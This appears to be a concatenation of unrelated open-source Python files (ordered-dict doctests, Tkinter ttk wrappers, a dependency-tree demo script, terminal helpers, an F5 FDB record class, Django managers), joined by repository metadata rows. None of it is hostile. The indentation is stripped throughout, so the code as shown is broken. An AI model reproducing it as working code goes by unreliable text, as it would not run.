>>> a.keys == b.keys
0
>>> b['a'] = 3
>>> a.keys == b.keys
1
>>> b['b'] = 3
>>> a.keys == b.keys
0
>>> a.keys > b.keys
0
>>> a.keys < b.keys
1
>>> 'a' in a.keys
1
>>> len(b.keys)
2
>>> 'c' in d.keys
0
>>> 1 in d.keys
1
>>> [v for v in d.keys]
[3, 1, 2]
>>> d.keys.sort()
>>> d.keys
[1, 2, 3]
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)), strict=True)
>>> d.keys[::-1] = [1, 2, 3]
>>> d
SequenceOrderedDict([(3, 4), (2, 3), (1, 2)])
>>> d.keys[:2]
[3, 2]
>>> d.keys[:2] = [1, 3]
Traceback (most recent call last):
KeyError: 'Keylist is not the same as current keylist.'
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.values
[2, 3, 4]
>>> d.values()
[2, 3, 4]
>>> d.setvalues((4, 3, 2))
>>> d
SequenceOrderedDict([(1, 4), (2, 3), (3, 2)])
>>> d.values[::-1]
[2, 3, 4]
>>> d.values[0]
4
>>> d.values[-2]
3
>>> del d.values[0]
Traceback (most recent call last):
TypeError: Can't delete items from values
>>> d.values[::2] = [2, 4]
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> 7 in d.values
0
>>> len(d.values)
3
>>> [val for val in d.values]
[2, 3, 4]
>>> d.values[-1] = 2
>>> d.values.count(2)
2
>>> d.values.index(2)
0
>>> d.values[-1] = 7
>>> d.values
[2, 3, 7]
>>> d.values.reverse()
>>> d.values
[7, 3, 2]
>>> d.values.sort()
>>> d.values
[2, 3, 7]
>>> d.values.append('anything')
Traceback (most recent call last):
TypeError: Can't append items to values
>>> d.values = (1, 2, 3)
>>> d
SequenceOrderedDict([(1, 1), (2, 2), (3, 3)])
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.items()
[(1, 2), (2, 3), (3, 4)]
>>> d.setitems([(3, 4), (2 ,3), (1, 2)])
>>> d
SequenceOrderedDict([(3, 4), (2, 3), (1, 2)])
>>> d.items[0]
(3, 4)
>>> d.items[:-1]
[(3, 4), (2, 3)]
>>> d.items[1] = (6, 3)
>>> d.items
[(3, 4), (6, 3), (1, 2)]
>>> d.items[1:2] = [(9, 9)]
>>> d
SequenceOrderedDict([(3, 4), (9, 9), (1, 2)])
>>> del d.items[1:2]
>>> d
SequenceOrderedDict([(3, 4), (1, 2)])
>>> (3, 4) in d.items
1
>>> (4, 3) in d.items
0
>>> len(d.items)
2
>>> [v for v in d.items]
[(3, 4), (1, 2)]
>>> d.items.count((3, 4))
1
>>> d.items.index((1, 2))
1
>>> d.items.index((2, 1))
Traceback (most recent call last):
ValueError: list.index(x): x not in list
>>> d.items.reverse()
>>> d.items
[(1, 2), (3, 4)]
>>> d.items.reverse()
>>> d.items.sort()
>>> d.items
[(1, 2), (3, 4)]
>>> d.items.append((5, 6))
>>> d.items
[(1, 2), (3, 4), (5, 6)]
>>> d.items.insert(0, (0, 0))
>>> d.items
[(0, 0), (1, 2), (3, 4), (5, 6)]
>>> d.items.insert(-1, (7, 8))
>>> d.items
[(0, 0), (1, 2), (3, 4), (7, 8), (5, 6)]
>>> d.items.pop()
(5, 6)
>>> d.items
[(0, 0), (1, 2), (3, 4), (7, 8)]
>>> d.items.remove((1, 2))
>>> d.items
[(0, 0), (3, 4), (7, 8)]
>>> d.items.extend([(1, 2), (5, 6)])
>>> d.items
[(0, 0), (3, 4), (7, 8), (1, 2), (5, 6)]
"""
def __init__(self, init_val=(), strict=True):
OrderedDict.__init__(self, init_val, strict=strict)
self._keys = self.keys
self._values = self.values
self._items = self.items
self.keys = Keys(self)
self.values = Values(self)
self.items = Items(self)
self._att_dict = {
'keys': self.setkeys,
'items': self.setitems,
'values': self.setvalues,
}
def __setattr__(self, name, value):
"""Protect keys, items, and values."""
if not '_att_dict' in self.__dict__:
object.__setattr__(self, name, value)
else:
try:
fun = self._att_dict[name]
except KeyError:
OrderedDict.__setattr__(self, name, value)
else:
fun(value)
# Tile wrapping copied from http://tkinter.unpythonic.net/wiki/TileWrapper.
# Will be able to replace with ttk from Python 2.7, eventually.
# only create these gui classes if Tkinter is available (so param does
# not depend on Tkinter).
try:
import Tkinter
from Tkconstants import * # CB: should get the specific imports and move to section below
Tkinter_imported = True
except ImportError:
Tkinter_imported = False
if Tkinter_imported:
if Tkinter.TkVersion >= 8.5:
class Style:
def default(self, style, **kw):
"""Sets the default value of the specified option(s) in style"""
pass
def map_style(self, **kw):
"""Sets dynamic values of the specified option(s) in style. See
"STATE MAPS", below."""
pass
def layout(self, style, layoutSpec):
"""Define the widget layout for style style. See "LAYOUTS" below
for the format of layoutSpec. If layoutSpec is omitted, return the
layout specification for style style. """
pass
def element_create(self, name, type, *args):
"""Creates a new element in the current theme of type type. The
only built-in element type is image (see image(n)), although
themes may define other element types (see
Ttk_RegisterElementFactory).
"""
pass
def element_names(self):
"""Returns a list of all elements defined in the current theme. """
pass
def theme_create(self, name, parent=None, basedon=None):
"""Creates a new theme. It is an error if themeName already exists.
If -parent is specified, the new theme will inherit styles, elements,
and layouts from the parent theme basedon. If -settings is present,
script is evaluated in the context of the new theme as per style theme
settings.
"""
pass
def theme_settings(self, name, script):
"""Temporarily sets the current theme to themeName, evaluate script,
then restore the previous theme. Typically script simply defines styles
and elements, though arbitrary Tcl code may appear.
"""
pass
def theme_names(self):
"""Returns a list of the available themes. """
return self.tk.call("style", "theme", "names")
def theme_use(self, theme):
"""Sets the current theme to themeName, and refreshes all widgets."""
return self.tk.call("style", "theme", "use", theme)
class Widget(Tkinter.Widget, Style):
def __init__(self, master, widgetName=None, cnf={}, kw={}, extra=()):
if not widgetName:
                    ## why you would ever want to create a Tile Widget is beyond me!
                    widgetName = "ttk::widget"
Tkinter.Widget.__init__(self, master, widgetName, cnf, kw)
def instate(self, spec=None, script=None):
"""Test the widget's state. If script is not specified, returns 1
if the widget state matches statespec and 0 otherwise. If script
is specified, equivalent to if {[pathName instate stateSpec]}
script.
"""
return self.tk.call(self._w, "instate", spec, script)
def state(self, spec=None):
"""Modify or inquire widget state. If stateSpec is present, sets
the widget state: for each flag in stateSpec, sets the corresponding
flag or clears it if prefixed by an exclamation point. Returns a new
state spec indicating which flags were changed: ''set changes
[pathName state spec] ; pathName state $changes'' will restore
pathName to the original state. If stateSpec is not specified,
returns a list of the currently-enabled state flags.
"""
return self.tk.call(self._w, "state", spec)
class Button(Widget, Tkinter.Button):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::button", cnf, kw)
###add frame support here--KWs
class Frame(Widget, Tkinter.Frame):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::frame", cnf, kw)
class Checkbutton(Widget, Tkinter.Checkbutton):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::checkbutton", cnf, kw)
class Combobox(Widget, Tkinter.Entry):
def __init__(self, master=None, cnf={}, **kw):
# HACK to work around strange parsing of list
if 'values' in kw:
values = kw['values']
if isinstance(values,list):
kw['values'] = tuple(values)
Widget.__init__(self, master, "ttk::combobox", cnf, kw)
def current(self, index=None):
"""If index is supplied, sets the combobox value to the element
at position newIndex in the list of -values. Otherwise, returns
the index of the current value in the list of -values or -1 if
the current value does not appear in the list.
"""
return self.tk.call(self._w, "current", index)
class Entry(Widget, Tkinter.Entry):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::entry", cnf, kw)
def validate(self):
"""Force revalidation, independent of the conditions specified by
the -validate option. Returns 0 if the -validatecommand returns a
false value, or 1 if it returns a true value or is not specified.
"""
return self.tk.call(self._w, "validate")
class Label(Widget, Tkinter.Label):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::label", cnf, kw)
###add LabelFrame class here--KW
class LabelFrame(Widget, Tkinter.Label):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::labelframe", cnf, kw)
class Menubutton(Widget, Tkinter.Menubutton):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::menubutton", cnf, kw)
class Notebook(Widget):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::notebook", cnf, kw)
def add(self, child, cnf=(), **kw):
"""Adds a new tab to the notebook. When the tab is selected, the
child window will be displayed. child must be a direct child of
the notebook window. See TAB OPTIONS for the list of available
options.
"""
return self.tk.call((self._w, "add", child) + self._options(cnf, kw))
def forget(self, index):
"""Removes the tab specified by index, unmaps and unmanages the
associated child window.
"""
return self.tk.call(self._w, "forget", index)
def index(self, index):
"""Returns the numeric index of the tab specified by index, or
the total number of tabs if index is the string "end".
"""
return self.tk.call(self._w, "index")
def select(self, index):
"""Selects the specified tab; the associated child pane will
be displayed, and the previously-selected pane (if different)
is unmapped.
"""
return self.tk.call(self._w, "select", index)
def tab(self, index, **kw):
"""Query or modify the options of the specific tab. If no
-option is specified, returns a dictionary of the tab option
values. If one -option is specified, returns the value of tha
t option. Otherwise, sets the -options to the corresponding
values. See TAB OPTIONS for the available options.
"""
return self.tk.call((self._w, "tab", index) + self._options(kw))
def tabs(self):
"""Returns a list of all pane windows managed by the widget."""
return self.tk.call(self._w, "tabs")
class Paned(Widget):
"""
WIDGET OPTIONS
Name Database name Database class
-orient orient Orient
Specifies the orientation of the window. If vertical, subpanes
are stacked top-to-bottom; if horizontal, subpanes are stacked
left-to-right.
PANE OPTIONS
The following options may be specified for each pane:
Name Database name Database class
-weight weight Weight
An integer specifying the relative stretchability of the pane.
            When the paned window is resized, the extra space is added to or
            subtracted from each pane proportionally to its -weight.
"""
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::panedwindow", cnf, kw)
def add(self, subwindow, **kw):
"""Adds a new pane to the window. subwindow must be a direct child of
the paned window pathname. See PANE OPTIONS for the list of available
options.
"""
return self.tk.call((self._w, "add", subwindow) + self._options(kw))
def forget(self, pane):
"""Removes the specified subpane from the widget. pane is either an
integer index or the name of a managed subwindow.
"""
self.tk.call(self._w, "forget", pane)
def insert(self, pos, subwindow, **kw):
"""Inserts a pane at the specified position. pos is either the string
end, an integer index, or the name of a managed subwindow. If subwindow
is already managed by the paned window, moves it to the specified
position. See PANE OPTIONS for the list of available options.
"""
return self.tk.call((self._w, "insert", pos, subwindow) + self._options(kw))
def pane(self, pane, **kw):
"""Query or modify the options of the specified pane, where pane is
either an integer index or the name of a managed subwindow. If no
-option is specified, returns a dictionary of the pane option values.
If one -option is specified, returns the value of that option.
Otherwise, sets the -options to the corresponding values.
"""
return self.tk.call((self._w, "pane", pane) + self._options(kw))
class Progressbar(Widget):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::progressbar", cnf, kw)
def step(self, amount=1.0):
"""Increments the -value by amount. amount defaults to 1.0
if omitted. """
return self.tk.call(self._w, "step", amount)
def start(self):
self.tk.call("ttk::progressbar::start", self._w)
def stop(self):
self.tk.call("ttk::progressbar::stop", self._w)
class Radiobutton(Widget, Tkinter.Radiobutton):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::radiobutton", cnf, kw)
class Scrollbar(Widget, Tkinter.Scrollbar):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::scrollbar", cnf, kw)
class Separator(Widget):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::separator", cnf, kw)
class Treeview(Widget, Tkinter.Listbox):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, 'ttk::treeview', cnf, kw)
def children(self, item, newchildren=None):
"""If newchildren is not specified, returns the list of
children belonging to item.
If newchildren is specified, replaces item's child list
with newchildren. Items in the old child list not present
in the new child list are detached from the tree. None of
the items in newchildren may be an ancestor of item.
"""
return self.tk.call(self._w, "children", item, newchildren)
def column(self, column, **kw):
"""Query or modify the options for the specified column.
If no options are specified, returns a dictionary of
option/value pairs. If a single option is specified,
returns the value of that option. Otherwise, the options
are updated with the specified values. The following
options may be set on each column:
-id name
The column name. This is a read-only option. For example,
[$pathname column #n -id] returns the data column
associated with data column #n.
-anchor
Specifies how the text in this column should be aligned
with respect to the cell. One of n, ne, e, se, s, sw, w,
nw, or center.
-width w
The width of the column in pixels. Default is something
reasonable, probably 200 or so.
"""
pass
def delete(self, items):
"""Deletes each of the items and all of their descendants.
The root item may not be deleted. See also: detach.
"""
return self.tk.call(self._w, "delete", items)
def detach(self, items):
"""Unlinks all of the specified items from the tree. The
items and all of their descendants are still present and
may be reinserted at another point in the tree but will
not be displayed. The root item may not be detached. See
also: delete.
"""
return self.tk.call(self._w, "detach", items)
def exists(self, item):
"""Returns 1 if the specified item is present in the
tree, 0 otherwise.
"""
return self.tk.call(self._w, "exists", item)
def focus(self, item=None):
"""If item is specified, sets the focus item to item.
Otherwise, returns the current focus item, or {} if there
is none.
"""
return self.tk.call(self._w, "focus", item)
def heading(self, column, **kw):
"""Query or modify the heading options for the specified
column. Valid options are:
-text text
The text to display in the column heading.
-image imageName
Specifies an image to display to the right of the column heading.
-command script
A script to evaluate when the heading label is pressed.
"""
pass
def identify(self, x, y):
"""Returns a description of the widget component under the point given
by x and y. The return value is a list with one of the following forms:
heading #n
The column heading for display column #n.
separator #n
The border to the right of display column #n.
cell itemid #n
The data value for item itemid in display column #n.
item itemid element
The tree label for item itemid; element is one of text, image, or
indicator, or another element name depending on the style.
row itemid
The y position is over the item but x does not identify any element
or displayed data value.
nothing
The coordinates are not over any identifiable object.
See COLUMN IDENTIFIERS for a discussion of display columns and data
columns.
"""
pass
def index(self, item):
"""Returns the integer index of item within its parent's list of
children.
"""
pass
def insert(self, parent, index, id=None, **kw):
"""Creates a new item. parent is the item ID of the parent item, or
the empty string {} to create a new top-level item. index is an
integer, or the value end, specifying where in the list of parent's
children to insert the new item. If index is less than or equal to
zero, the new node is inserted at the beginning; if index is greater
than or equal to the current number of children, it is inserted at the
end. If -id is specified, it is used as the item identifier; id must
not already exist in the tree. Otherwise, a new unique identifier is
generated.
returns the item identifier of the newly created item. See ITEM
OPTIONS for the list of available options.
"""
pass
def item(item, **kw):
"""Query or modify the options for the specified item. If no -option
is specified, returns a dictionary of option/value pairs. If a single
-option is specified, returns the value of that option. Otherwise, the
item's options are updated with the specified values. See ITEM OPTIONS
for the list of available options.
"""
pass
def move(self, item, parent, index):
"""Moves item to position index in parent's list of children. It is
illegal to move an item under one of its descendants.
If index is less than or equal to zero, item is moved to the
beginning; if greater than or equal to the number of children, it's
moved to the end.
"""
pass
def next(self, item):
"""Returns the identifier of item's next sibling, or {} if item is the
last child of its parent.
"""
pass
def parent(self, item):
"""Returns the ID of the parent of item, or {} if item is at the top
level of the hierarchy.
"""
pass
def prev(self, item):
"""Returns the identifier of item's previous sibling, or {} if item is
the first child of its parent.
"""
pass
def selection(self):
"""Returns the list of selected items"""
pass
def selection_set(self, items):
"""items becomes the new selection. """
pass
def selection_add(self, items):
"""Add items to the selection """
pass
def selection_remove(self, items):
"""Remove items from the selection """
pass
def selection_toggle(self, items):
"""Toggle the selection state of each item in items. """
pass
def set(self, item, column, value=None):
"""If value is specified, sets the value of column column in item item,
otherwise returns the current value. See COLUMN IDENTIFIERS.
"""
pass
else:
print "GUI: tcl/tk version is older than 8.5; using simple back-up widgets."
# In the future, could add more fake tile widgets (or handle more methods of
# existing ones) if required.
class FakeCombobox(Tkinter.OptionMenu):
def __init__(self, master=None, textvariable=None,values=None,state=None,**kw):
# missing state=readonly
# missing current()
Tkinter.OptionMenu.__init__(self,master,textvariable,*values)
Combobox = FakeCombobox
class FakeProgressbar(Tkinter.Frame):
def __init__(self,master=None,cnf={},**kw):
Tkinter.Frame.__init__(self,master)
def step(self,amount=1.0):
pass
def start(self):
pass
def stop(self):
pass
Progressbar = FakeProgressbar
# CB: tix has Notebook, Combobox, and Meter, but I wouldn't
# want to rely on Tix being present (even though it is
# supposed to be part of Python's standard library).
| bsd-3-clause | 419,085,562,894,774,600 | 34.977368 | 93 | 0.506839 | false | 4.092743 | false | false | false |
andrecunha/idd3 | examine.py | 1 | 2041 | # -*- coding: utf-8 -*-
# IDD3 - Propositional Idea Density from Dependency Trees
# Copyright (C) 2014-2015 Andre Luiz Verucci da Cunha
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function, unicode_literals, division
import pprint
import idd3
from idd3 import Relation, Engine
from idd3.rules import en
import nltk
from sys import argv
import logging
logging.basicConfig(level=logging.DEBUG)
try:
from termcolor import colored
except ImportError:
def colored(string, color, attrs):
return string
def demo():
idd3.use_language(en)
graphs = nltk.parse.dependencygraph.DependencyGraph.load(argv[1])
index = int(argv[2]) - 1
engine = Engine(idd3.all_rulesets, idd3.all_transformations)
relations = []
for relation in graphs[index].nodelist:
relations.append(Relation(**relation))
print(colored('Sentence %d:' % (index + 1), 'white', attrs=['bold']))
pprint.pprint(relations)
print(colored('Propositions:', 'white', attrs=['bold']))
engine.analyze(relations)
for i, prop in enumerate(engine.props):
print(str(i + 1) + ' ' + str(prop))
print(colored('Unprocessed relations:', 'white', attrs=['bold']))
for relation in engine.get_unprocessed_relations(relations):
print(relation)
if __name__ == '__main__':
if len(argv) != 3:
print('Usage: python', argv[0], '<conll file>', '<index>')
else:
demo()
| gpl-3.0 | 3,371,991,498,734,300,700 | 30.890625 | 78 | 0.696227 | false | 3.751838 | false | false | false |
JMSwag/jms-utils | jms_utils/terminal.py | 1 | 8327 | # --------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2014-2016 Digital Sapphire
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# --------------------------------------------------------------------------
from __future__ import print_function
import logging
try:
import msvcrt
except ImportError:
msvcrt = None
import locale
import optparse
import os
import platform
import shlex
import struct
import subprocess
import sys
try:
import termios
except ImportError:
termios = None
try:
import tty
except ImportError:
tty = None
import six
log = logging.getLogger(__name__)
def print_to_console(text):
enc = locale.getdefaultlocale()[1] or "utf-8"
try:
print(text.encode(enc, errors="backslashreplace"))
except (LookupError, UnicodeEncodeError):
# Unknown encoding or encoding problem. Fallback to ascii
print(text.encode("ascii", errors="backslashreplace"))
def terminal_formatter():
max_width = 80
max_help_position = 80
# No need to wrap help messages if we're on a wide console
columns = get_terminal_size()[0]
if columns:
max_width = columns
fmt = optparse.IndentedHelpFormatter(width=max_width,
max_help_position=max_help_position)
return fmt
# get width and height of console
# works on linux, os x, windows, cygwin(windows)
# originally retrieved from:
# http://stackoverflow.com/questions/
# 566746/how-to-get-console-window-width-in-python
def get_terminal_size():
current_os = platform.system()
tuple_xy = None
if current_os == u'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in [u'Linux', u'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
log.debug(u"default")
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# http://stackoverflow.com/questions/263890/
# how-do-i-find-the-width-height-of-a-terminal-window
try:
cols = int(subprocess.check_call(shlex.split('tput cols')))
rows = int(subprocess.check_call(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
# Is this required
# import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
# Gets a single character form standard input. Does not echo to the screen
class GetCh:
def __init__(self):
if sys.platform == u'win32':
self.impl = _GetchWindows()
else:
self.impl = _GetchUnix()
def __call__(self):
return self.impl()
class _GetchUnix:
def __init__(self):
pass
def __call__(self):
pass
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
pass
def __call__(self):
return msvcrt.getch()
def ask_yes_no(question, default='no', answer=None):
u"""Will ask a question and keeps prompting until
answered.
Args:
question (str): Question to ask end user
default (str): Default answer if user just press enter at prompt
answer (str): Used for testing
Returns:
(bool) Meaning:
True - Answer is yes
False - Answer is no
"""
default = default.lower()
yes = [u'yes', u'ye', u'y']
no = [u'no', u'n']
if default in no:
help_ = u'[N/y]?'
default = False
else:
default = True
help_ = u'[Y/n]?'
while 1:
display = question + '\n' + help_
if answer is None:
log.debug(u'Under None')
answer = six.moves.input(display)
answer = answer.lower()
if answer == u'':
log.debug(u'Under blank')
return default
if answer in yes:
log.debug(u'Must be true')
return True
elif answer in no:
log.debug(u'Must be false')
return False
else:
sys.stdout.write(u'Please answer yes or no only!\n\n')
sys.stdout.flush()
answer = None
six.moves.input(u'Press enter to continue')
sys.stdout.write('\n\n\n\n\n')
sys.stdout.flush()
def get_correct_answer(question, default=None, required=False,
answer=None, is_answer_correct=None):
u"""Ask user a question and confirm answer
Args:
question (str): Question to ask user
default (str): Default answer if no input from user
required (str): Require user to input answer
answer (str): Used for testing
is_answer_correct (str): Used for testing
"""
while 1:
if default is None:
msg = u' - No Default Available'
else:
msg = (u'\n[DEFAULT] -> {}\nPress Enter To '
u'Use Default'.format(default))
prompt = question + msg + u'\n--> '
if answer is None:
answer = six.moves.input(prompt)
if answer == '' and required and default is not None:
print(u'You have to enter a value\n\n')
six.moves.input(u'Press enter to continue')
print(u'\n\n')
answer = None
continue
if answer == u'' and default is not None:
answer = default
_ans = ask_yes_no(u'You entered {}, is this '
u'correct?'.format(answer),
answer=is_answer_correct)
if _ans:
return answer
else:
answer = None
| mit | -2,106,631,287,010,268,000 | 28.217544 | 79 | 0.578119 | false | 3.9976 | false | false | false |
f5devcentral/f5-cccl | f5_cccl/resource/net/fdb/record.py | 1 | 1541 | """Provides a class for managing BIG-IP FDB tunnel record resources."""
# coding=utf-8
#
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from f5_cccl.resource import Resource
from f5_cccl.utils.route_domain import normalize_address_with_route_domain
LOGGER = logging.getLogger(__name__)
class Record(Resource):
"""Record class for managing network configuration on BIG-IP."""
properties = dict(name=None, endpoint=None)
def __init__(self, name, default_route_domain, **data):
"""Create a record from CCCL recordType."""
super(Record, self).__init__(name, partition=None)
endpoint = data.get('endpoint', None)
self._data['endpoint'] = normalize_address_with_route_domain(
endpoint, default_route_domain)[0]
def __eq__(self, other):
if not isinstance(other, Record):
return False
return super(Record, self).__eq__(other)
def _uri_path(self, bigip):
raise NotImplementedError
| apache-2.0 | 8,939,869,457,900,549,000 | 32.5 | 74 | 0.69695 | false | 3.992228 | false | false | false |
emilkjer/django-model-utils | model_utils/managers.py | 1 | 8414 | from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
"""
FIX see https://bitbucket.org/carljm/django-model-utils/pull-request/5/patch-to-issue-16/diff
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
"""
def get_attribute(obj, s):
try:
return getattr(obj,s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
"""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
"""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, "_db"):
kwargs["using"] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
"""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
